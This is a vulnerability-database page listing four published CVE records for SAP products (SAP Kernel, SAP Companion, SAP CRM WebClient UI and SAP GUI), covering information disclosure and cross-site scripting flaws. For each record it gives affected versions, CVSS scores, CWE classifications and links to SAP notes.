| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver Application Server ABAP (SAP Kernel) |
Version: KERNEL 7.53 Version: KERNEL 7.54 Version: KERNEL 7.77 Version: KERNEL 7.85 Version: KERNEL 7.89 Version: KERNEL 7.93 Version: KERNEL 7.94 Version: KRNL64UC 7.53 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T23:28:11.763Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3360827", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP NetWeaver Application Server ABAP (SAP Kernel)", vendor: "SAP_SE", versions: [ { status: "affected", version: "KERNEL 7.53", }, { status: "affected", version: "KERNEL 7.54", }, { status: "affected", version: "KERNEL 7.77", }, { status: "affected", version: "KERNEL 7.85", }, { status: "affected", version: "KERNEL 7.89", }, { status: "affected", version: "KERNEL 7.93", }, { status: "affected", version: "KERNEL 7.94", }, { status: "affected", version: "KRNL64UC 7.53", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP NetWeaver Application Server (ABAP) - versions KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53, under certain conditions, allows an attacker to access information which could otherwise be restricted with low impact on confidentiality of the application.</p>", }, ], value: "SAP NetWeaver Application Server (ABAP) - versions KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53, under certain conditions, allows an attacker to access information which could otherwise be restricted with low impact on confidentiality of the application.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-732", description: "CWE-732: Incorrect Permission Assignment for Critical Resource", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-09-28T22:22:42.214Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3360827", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Information Disclosure vulnerability in SAP NetWeaver Application Server ABAP (SAP Kernel)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24740", datePublished: "2024-02-13T02:35:21.224Z", dateReserved: "2024-01-29T05:13:46.617Z", dateUpdated: "2024-09-28T22:22:42.214Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-22129
Vulnerability from cvelistv5
Published
2024-02-13 03:40
Modified
2024-08-01 22:35
Severity ?
EPSS score ?
Summary
SAP Companion - version <3.1.38, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information and cause minor impact on the integrity of the web application.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP Companion |
Version: <3.1.38 |
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-22129", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-16T15:17:38.457926Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:52:24.034Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.889Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3404025", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Companion", vendor: "SAP_SE", versions: [ { status: "affected", version: "<3.1.38", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP Companion - version <3.1.38, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information and cause minor impact on the integrity of the web application.</p>", }, ], value: "SAP Companion - version <3.1.38, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information and cause minor impact on the integrity of the web application.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.4, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T03:40:54.670Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3404025", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Cross-Site Scripting (XSS) vulnerability in SAP Companion", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22129", datePublished: "2024-02-13T03:40:54.670Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.889Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-24742
Vulnerability from cvelistv5
Published
2024-02-13 02:42
Modified
2024-08-01 23:28
Severity ?
EPSS score ?
Summary
SAP CRM WebClient UI - version S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to integrity of the application data after successful exploitation. There is no impact on confidentiality and availability.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP CRM (WebClient UI) |
Version: S4FND 102 Version: S4FND 103 Version: S4FND 104 Version: S4FND 105 Version: S4FND 106 Version: WEBCUIF 701 Version: WEBCUIF 731 Version: WEBCUIF 746 Version: WEBCUIF 747 Version: WEBCUIF 748 Version: WEBCUIF 800 Version: WEBCUIF 801 |
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-24742", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-03-07T18:45:10.761225Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:43:29.079Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T23:28:12.196Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3158455", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP CRM (WebClient UI)", vendor: "SAP_SE", versions: [ { status: "affected", version: "S4FND 102", }, { status: "affected", version: "S4FND 103", }, { status: "affected", version: "S4FND 104", }, { status: "affected", version: "S4FND 105", }, { status: "affected", version: "S4FND 106", }, { status: "affected", version: "WEBCUIF 701", }, { status: "affected", version: "WEBCUIF 731", }, { status: "affected", version: "WEBCUIF 746", }, { status: "affected", version: "WEBCUIF 747", }, { status: "affected", version: "WEBCUIF 748", }, { status: "affected", version: "WEBCUIF 800", }, { status: "affected", version: "WEBCUIF 801", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP CRM WebClient UI - version S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to integrity of the application data after successful exploitation. There is no impact on confidentiality and availability.</p>", }, ], value: "SAP CRM WebClient UI - version S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to integrity of the application data after successful exploitation. There is no impact on confidentiality and availability.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.1, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:42:56.483Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3158455", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Cross-Site Scripting (XSS) vulnerability in SAP CRM (WebClient UI)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24742", datePublished: "2024-02-13T02:42:56.483Z", dateReserved: "2024-01-29T05:13:46.617Z", dateUpdated: "2024-08-01T23:28:12.196Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2023-49580
Vulnerability from cvelistv5
Published
2023-12-12 01:09
Modified
2024-09-28 22:14
Severity ?
EPSS score ?
Summary
SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP GUI for Windows and SAP GUI for Java |
Version: SAP_BASIS 755 Version: SAP_BASIS 756 Version: SAP_BASIS 757 Version: SAP_BASIS 758 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-02T22:01:25.577Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3385711", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP GUI for Windows and SAP GUI for Java", vendor: "SAP_SE", versions: [ { status: "affected", version: "SAP_BASIS 755", }, { status: "affected", version: "SAP_BASIS 756", }, { status: "affected", version: "SAP_BASIS 757", }, { status: "affected", version: "SAP_BASIS 758", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP.</p>", }, ], value: "SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-732", description: "CWE-732: Incorrect Permission Assignment for Critical Resource", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-09-28T22:14:46.907Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3385711", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Information disclosure in SAP GUI for Windows and SAP GUI for Java", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2023-49580", datePublished: "2023-12-12T01:09:55.716Z", dateReserved: "2023-11-27T18:07:40.886Z", dateUpdated: "2024-09-28T22:14:46.907Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
Log in or create an account to share your comment.
Security Advisory comment format.
This schema specifies the format of a comment related to a security advisory.
UUIDv4 of the comment
UUIDv4 of the Vulnerability-Lookup instance
When the comment was created originally
When the comment was last updated
Title of the comment
Description of the comment
The identifier of the vulnerability (CVE ID, GHSA-ID, PYSEC ID, etc.).
Loading…
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.